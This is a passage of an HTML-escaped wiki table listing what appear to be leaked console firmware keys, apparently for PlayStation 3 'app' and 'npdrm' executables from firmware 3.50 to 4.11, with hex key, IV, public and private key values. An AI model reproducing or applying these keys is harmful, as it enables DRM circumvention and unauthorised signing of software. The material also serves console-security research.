&lt;code&gt;AB284CA549B2DE9AA5C903B75652F78D192F8F4A8F3CD99209415C0A84C5C9FD6BF3095C1C18FFCD&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;002CF896D35DB871D0E6A252E799876A70D043C23E&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50&lt;/span&gt; || 0x08 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50++&lt;/span&gt; || dec || &lt;code&gt;2C9E8969EC44DFB6A8771DC7F7FDFBCCAF329EC3EC070900CABB23742A9A6E13&lt;/code&gt; || &lt;code&gt;5A4CEFD5A9C3C093D0B9352376D19405&lt;/code&gt; || &lt;code&gt;6E82F6B54A0E9DEBE4A8B3043EE3B24CD9BBB62B4416B0482582E419A2552E29AB4BEA0A4D7FA2D5&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x16&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50&lt;/span&gt; || 0x09 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50++&lt;/span&gt; || dec || &lt;code&gt;F69E4A2934F114D89F386CE766388366CDD210F1D8913E3B973257F1201D632B&lt;/code&gt; || &lt;code&gt;F4D535069301EE888CC2A852DB654461&lt;/code&gt; || &lt;code&gt;1D7B974D10E61C2ED087A0981535904677EC07E96260F89565FF7EBDA4EE035C2AA9BCBDD5893F99&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2D&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.50&lt;/span&gt; || 0x08 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.50 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;8E944267C02E69A4FE474B7F5FCD7974A4F936FF4355AEC4F80EFA123858D8F6&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;908A75754E521EAC2F5A4889C6D7B72D&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;91201DA7D79E8EE2563142ECBD646DA026C963AC09E760E5390FFE24DAE6864310ABE147F8204D0B&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x13&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.50 || 0x07 np || 3.50++ || dec || &lt;code&gt;3946DFAA141718C7BE339A0D6C26301C76B568AEBC5CD52652F2E2E0297437C3&lt;/code&gt; || &lt;code&gt;E4897BE553AE025CDCBF2B15D1C9234E&lt;/code&gt; || &lt;code&gt;A13AFE8B63F897DA2D3DC3987B39389DC10BAD99DFB703838C4A0BC4E8BB44659C726CFD0CE60D0E&lt;/code&gt; || &lt;code&gt;009EF86907782A318D4CC3617EBACE2480E73A46F6&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | npdrm || 3.50 || 0x09 np || 3.50++ || dec || &lt;code&gt;0786F4B0CA5937F515BDCE188F569B2EF3109A4DA0780A7AA07BD89C3350810A&lt;/code&gt; || &lt;code&gt;04AD3C2F122A3B35E804850CAD142C6D&lt;/code&gt; || &lt;code&gt;A1FE61035DBBEA5A94D120D03C000D3B2F084B9F4AFA99A2D4A588DF92B8F36327CE9E47889A45D0&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.55 || 0x0A || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.55+ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;29805302E7C92F204009161CA93F776A072141A8C46A108E571C46D473A176A3&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;5D1FAB844107676ABCDFC25EAEBCB633&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;09301B6436C85B53CB1585300A3F1AF9FB14DB7C30088C4642AD66D5C148B8995BB1A698A8C71827&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0010818ED8A666051C6198662C3D6DDE2CA4901DDC&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55-?&lt;/span&gt; || 0x0B || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55++&lt;/span&gt; || dec || &lt;code&gt;A4C97402CC8A71BC7748661FE9CE7DF44DCE95D0D58938A59F47B9E9DBA7BFC3&lt;/code&gt; || &lt;code&gt;E4792F2B9DB30CB8D1596077A13FB3B5&lt;/code&gt; || &lt;code&gt;2733C889D289550FE00EAA5A47A34CEF0C1AF187610EB07BA35D2C09BB73C80B244EB4147700D1BF&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x26&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55-?&lt;/span&gt; || 0x0C || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55++&lt;/span&gt; || dec || &lt;code&gt;9814EFFF67B7074D1B263BF85BDC8576CE9DEC914123971B169472A1BC2387FA&lt;/code&gt; || &lt;code&gt;D43B1FA8BE15714B3078C23908BB2BCA&lt;/code&gt; || &lt;code&gt;7D1986C6BEE6CE1E0C5893BD2DF203881F40D5056761CC3F1F2E9D9A378617A2DE40BA5F09844CEB&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3D&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.55&lt;/span&gt; || 0x0B np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.55 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BB31DF9A6F62C0DF853075FAA65134D9CE2240306C1731D1F7DA9B5329BD699F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;263057225873F83940A65C8C926AC3E4&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BC3A82A4F44C43A197070CD236FDC94FCC542D69A3E803E0AFF78D1F3DA19A79D2F61FAB5B94B437&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x23&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.55 || 0x0A np || 3.55++ || dec || &lt;code&gt;03C21AD78FBB6A3D425E9AAB1298F9FD70E29FD4E6E3A3C151205DA50C413DE4&lt;/code&gt; || &lt;code&gt;0A99D4D4F8301A88052D714AD2FB565E&lt;/code&gt; || &lt;code&gt;3995C390C9F7FBBAB124A1C14E70F9741A5E6BDF17A605D88239652C8EA7D5FC9F24B30546C1E44B&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | npdrm || 3.55-? || 0x0C np || 3.55++ || dec || &lt;code&gt;357EBBEA265FAEC271182D571C6CD2F62CFA04D325588F213DB6B2E0ED166D92&lt;/code&gt; || &lt;code&gt;D26E6DD2B74CD78E866E742E5571B84F&lt;/code&gt; || &lt;code&gt;00DCF5391618604AB42C8CFF3DC304DF45341EBA4551293E9E2B68FFE2DF527FFA3BE8329E015E57&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-?&lt;/span&gt; || 0x0D || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;03B4C421E0C0DE708C0F0B71C24E3EE04306AE7383D8C5621394CCB99FF7A194&lt;/code&gt; || &lt;code&gt;5ADB9EAFE897B54CB1060D6885BE22CF&lt;/code&gt; || &lt;code&gt;71502ADB5783583AB88B2D5F23F419AF01C8B1E72FCA1E694AD49FE3266F1F9C61EFC6F29B351142&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-?&lt;/span&gt; || 0x0E || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;39A870173C226EB8A3EEE9CA6FB675E82039B2D0CCB22653BFCE4DB013BAEA03&lt;/code&gt; || &lt;code&gt;90266C98CBAA06C1BF145FF760EA1B45&lt;/code&gt; || &lt;code&gt;84DE5692809848E5ACBE25BE548F6981E3DB14735A5DDE1A0FD1F475866532B862B1AB6A004B7255&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-? || 0x0F || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;FD52DFA7C6EEF5679628D12E267AA863B9365E6DB95470949CFD235B3FCA0F3B&lt;/code&gt; || &lt;code&gt;64F50296CF8CF49CD7C643572887DA0B&lt;/code&gt; || &lt;code&gt;0696D6CCBD7CF585EF5E00D547503C185D7421581BAD196E081723CD0A97FA40B2C0CD2492B0B5A1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.56&lt;/span&gt; || 0x0E np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.56 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;71AA75C70A255580E4AE9BDAA0B08828C53EAA713CD0713797F143B284C1589B&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;9DED878CB6BA07121C0F50E7B172A8BF&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;387FCDAEAFF1B59CFAF79CE6215A065ACEAFFAF4048A4F217E1FF5CE67C66EC3F089DB235E52F9D3&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x29&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.56 || 0x0D np || 3.56++ || dec || &lt;code&gt;337A51416105B56E40D7CAF1B954CDAF4E7645F28379904F35F27E81CA7B6957&lt;/code&gt; || &lt;code&gt;8405C88E042280DBD794EC7E22B74002&lt;/code&gt; || &lt;code&gt;9BFF1CC7118D2393DE50D5CF44909860683411A532767BFDAC78622DB9E5456753FE422CBAFA1DA1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x18&lt;/code&gt;<br /> |-<br /> | npdrm || 3.56 || 0x0F np || 3.56++ || dec || &lt;code&gt;135C098CBE6A3E037EBE9F2BB9B30218DDE8D68217346F9AD33203352FBB3291&lt;/code&gt; || &lt;code&gt;4070C898C2EAAD1634A288AA547A35A8&lt;/code&gt; || &lt;code&gt;BBD7CCCB556C2EF0F908DC7810FAFC37F2E56B3DAA5F7FAF53A4944AA9B841F76AB091E16B231433&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3B&lt;/code&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x10 || 3.60++ || dec || &lt;code&gt;A5E51AD8F32FFBDE808972ACEE46397F2D3FE6BC823C8218EF875EE3A9B0584F&lt;/code&gt; || &lt;code&gt;7A203D5112F799979DF0E1B8B5B52AA4&lt;/code&gt; || &lt;code&gt;50597B7F680DD89F6594D9BDC0CBEE03666AB53647D0487F7F452FE2DD02694631EA755548C9E934&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | npdrm || 3.60-3.61 || 0x10 np || 3.60++ || dec || &lt;code&gt;4B3CD10F6A6AA7D99F9B3A660C35ADE08EF01C2C336B9E46D1BB5678B4261A61&lt;/code&gt; || &lt;code&gt;C0F2AB86E6E0457552DB50D7219371C5&lt;/code&gt; || &lt;code&gt;64A5C60BC2AD18B8A237E4AA690647E12BF7A081523FAD4F29BE89ACAC72F7AB43C74EC9AFFDA213&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x11 || 3.60++ || dec || &lt;code&gt;0F8EAB8884A51D092D7250597388E3B8B75444AC138B9D36E5C7C5B8C3DF18FD&lt;/code&gt; || &lt;code&gt;97AF39C383E7EF1C98FA447C597EA8FE&lt;/code&gt; || &lt;code&gt;2FDA7A56AAEA65921C0284FF1942C6DE137370093D106034B59191951A5201B422D462F8726F852D&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x26&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.60-3.61&lt;/span&gt; || 0x11 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.60&amp;nbsp;&amp;lt;=3.61&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;F5D1DBC182F5083CD4EA37C431C7DAC73882C07F232D2699B1DD9FDDF1BF4195&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;D3A7C3C91CBA014FCBCA6D5570DE13FF&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;97CA8A9781F45E557E98F176EF794FCDA6B151EB3DFD1ABA12151E00AE59957C3B15628FC8875D28&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x23&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x12 || =&amp;gt;3.60&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;D127E0F7F31F2546D374E46F26A45F14016308EDB409185187AB7F0B2DEE6715&lt;/code&gt; || &lt;code&gt;25589F01B97B9BE1E07447A3CE7F06B9&lt;/code&gt; || &lt;code&gt;3C266FF46D1F526405CCCDD67EE9C7D5693B4A072C06988CAD22ADDB64439A32E2337722F51FC15B&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3D&lt;/code&gt;<br /> |-<br /> | npdrm || 3.60-3.61 || 0x12 np || =&amp;gt;3.60&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;D2F32F6E1D7A96131FAECE657008B57AAC14A9475CEF983A55E6C82CF1FCC374&lt;/code&gt; || &lt;code&gt;211B52440AB7066A53121106FEB29FD5&lt;/code&gt; || &lt;code&gt;EA2F8826D1ECA47B029B41C833615006FAF535AAD30594319EA4F767925EBAE3A3EEE32E6D29580C&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | npdrm || 3.65-3.66 || 0x13 np || 3.65++ || dec || &lt;code&gt;265C93CF48562EC5D18773BEB7689B8AD10C5EB6D21421455DEBC4FB128CBF46&lt;/code&gt; || &lt;code&gt;8DEA5FF959682A9B98B688CEA1EF4A1D&lt;/code&gt; || &lt;code&gt;9D8DB5A880608DC69717991AFC3AD5C0215A5EE413328C2ABC8F35589E04432373DB2E2339EEF7C8&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x18&lt;/code&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x13 || 3.65++ || dec || &lt;code&gt;DBF62D76FC81C8AC92372A9D631DDC9219F152C59C4B20BFF8F96B64AB065E94&lt;/code&gt; || &lt;code&gt;CB5DD4BE8CF115FFB25801BC6086E729&lt;/code&gt; || &lt;code&gt;B26FE6D3E3A1E766FAE79A8E6A7F48998E7FC1E4B0AD8745FF54C018C2A6CC7A0DD7525FAFEA4917&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x14 || 3.65++ || dec || &lt;code&gt;491B0D72BB21ED115950379F4564CE784A4BFAABB00E8CB71294B192B7B9F88E&lt;/code&gt; || &lt;code&gt;F98843588FED8B0E62D7DDCB6F0CECF4&lt;/code&gt; || &lt;code&gt;04275E8838EF95BD013B223C3DF674540932F21B534C7ED2944B9104D938FEB03B824DDB866AB26E&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.65-3.66&lt;/span&gt; || 0x14 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.65&amp;nbsp;&amp;lt;=3.66&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BF10F09590C0152F7EF749FF4B990122A4E8E5491DA49A2D931E72EEB990F860&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;22C19C5522F7A782AFC547C2640F5BDE&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;3233BA2B284189FB1687DF653002257A0925D8EB0C64EBBE8CC7DE87F548D107DE1FD3D1D285DB4F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x29&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x15 || =&amp;gt;3.65&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;324D2BFEDA4044604EDCA550EB7F56065C4CA91DFB2636EC78030353DC1CEFF4&lt;/code&gt; || &lt;code&gt;A37B2139FBCF62F6B41F796A594440C8&lt;/code&gt; || &lt;code&gt;A6283C12B04C37DDC6EBBF4B31E5F1B1B2602DC83EBA6362C9C1189BF25A3EF1BB3766625A4E9694&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | npdrm || 3.65-3.66 || 0x15 np || =&amp;gt;3.65&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;3DED5C82E18CD9F695855B1757CA91447EA34D906A66BEAAB46113F9BCE1D92F&lt;/code&gt; || &lt;code&gt;ABF2DA36D993554FB060322DC51097F7&lt;/code&gt; || &lt;code&gt;497296C62F2C489F9F0E7628887AD54715EFD1227B053C6AA4501D43FF6FB536B78315C08D786569&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3B&lt;/code&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x16 || 3.70++ || dec || &lt;code&gt;A106692224F1E91E1C4EBAD4A25FBFF66B4B13E88D878E8CD072F23CD1C5BF7C&lt;/code&gt; || &lt;code&gt;62773C70BD749269C0AFD1F12E73909E&lt;/code&gt; || &lt;code&gt;566635D3E1DCEC47243AAD1628AE6B2CEB33463FC155E4635846CE33899C5E353DDFA47FEF5694AF&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | npdrm || 3.70-3.74 || 0x16 np || 3.70++ || dec || &lt;code&gt;7910340483E419E55F0D33E4EA5410EEEC3AF47814667ECA2AA9D75602B14D4B&lt;/code&gt; || &lt;code&gt;4AD981431B98DFD39B6388EDAD742A8E&lt;/code&gt; || &lt;code&gt;62DFE488E410B1B6B2F559E4CB932BCB78845AB623CC59FDF65168400FD76FA82ED1DC60E091D1D1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x17 || 3.70++ || dec || &lt;code&gt;4E104DCE09BA878C75DA98D0B1636F0E5F058328D81419E2A3D22AB0256FDF46&lt;/code&gt; || &lt;code&gt;954A86C4629E116532304A740862EF85&lt;/code&gt; || &lt;code&gt;3B7B04C71CAE2B1199D57453C038BB1B541A05AD1B94167B0AB47A9B24CAECB9000CB21407009666&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.70-3.74&lt;/span&gt; || 0x17 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.70&amp;nbsp;&amp;lt;=3.74&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;F11DBD2C97B32AD37E55F8E743BC821D3E67630A6784D9A058DDD26313482F0F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;FC5FA12CA3D2D336C4B8B425D679DA55&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;19E27EE90E33EDAB16B22E688B5F704E5C6EC1062070EBF43554CD03DFDAE16D684BB8B5574DBECA&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x15&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x18 || =&amp;gt;3.70&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;1F876AB252DDBCB70E74DC4A20CD8ED51E330E62490E652F862877E8D8D0F997&lt;/code&gt; || &lt;code&gt;BF8D6B1887FA88E6D85C2EDB2FBEC147&lt;/code&gt; || &lt;code&gt;64A04126D77BF6B4D686F6E8F87DD150A5B014BA922D2B694FFF4453E11239A6E0B58F1703C51494&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | npdrm || 3.70-3.74 || 0x18 np || =&amp;gt;3.70&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;1A4B32C927257811F777997EA9549CEFD2AE829A528F771A3EE7FEB2110E0133&lt;/code&gt; || &lt;code&gt;402666C76D795D228089810DDC128D14&lt;/code&gt; || &lt;code&gt;ABD149AB27BEE0DEC0E34BB8A8CA225E3FCF504E2DDE6A55BBD39A06CFB068CFC3CF5DF8B117EB5A&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x19 || 4.00++ || dec || &lt;code&gt;3236B9937174DF1DC12EC2DD8A318A0EA4D3ECDEA5DFB4AC1B8278447000C297&lt;/code&gt; || &lt;code&gt;6153DEE781B8ADDC6A439498B816DC46&lt;/code&gt; || &lt;code&gt;148DCA961E2738BAF84B2D1B6E2DA2ABD6A95F2C9571E54C6922F9ED9674F062B7F1BE5BD6FA5268&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x31&lt;/code&gt;<br /> |-<br /> | npdrm || 4.00-4.11 || 0x19 np 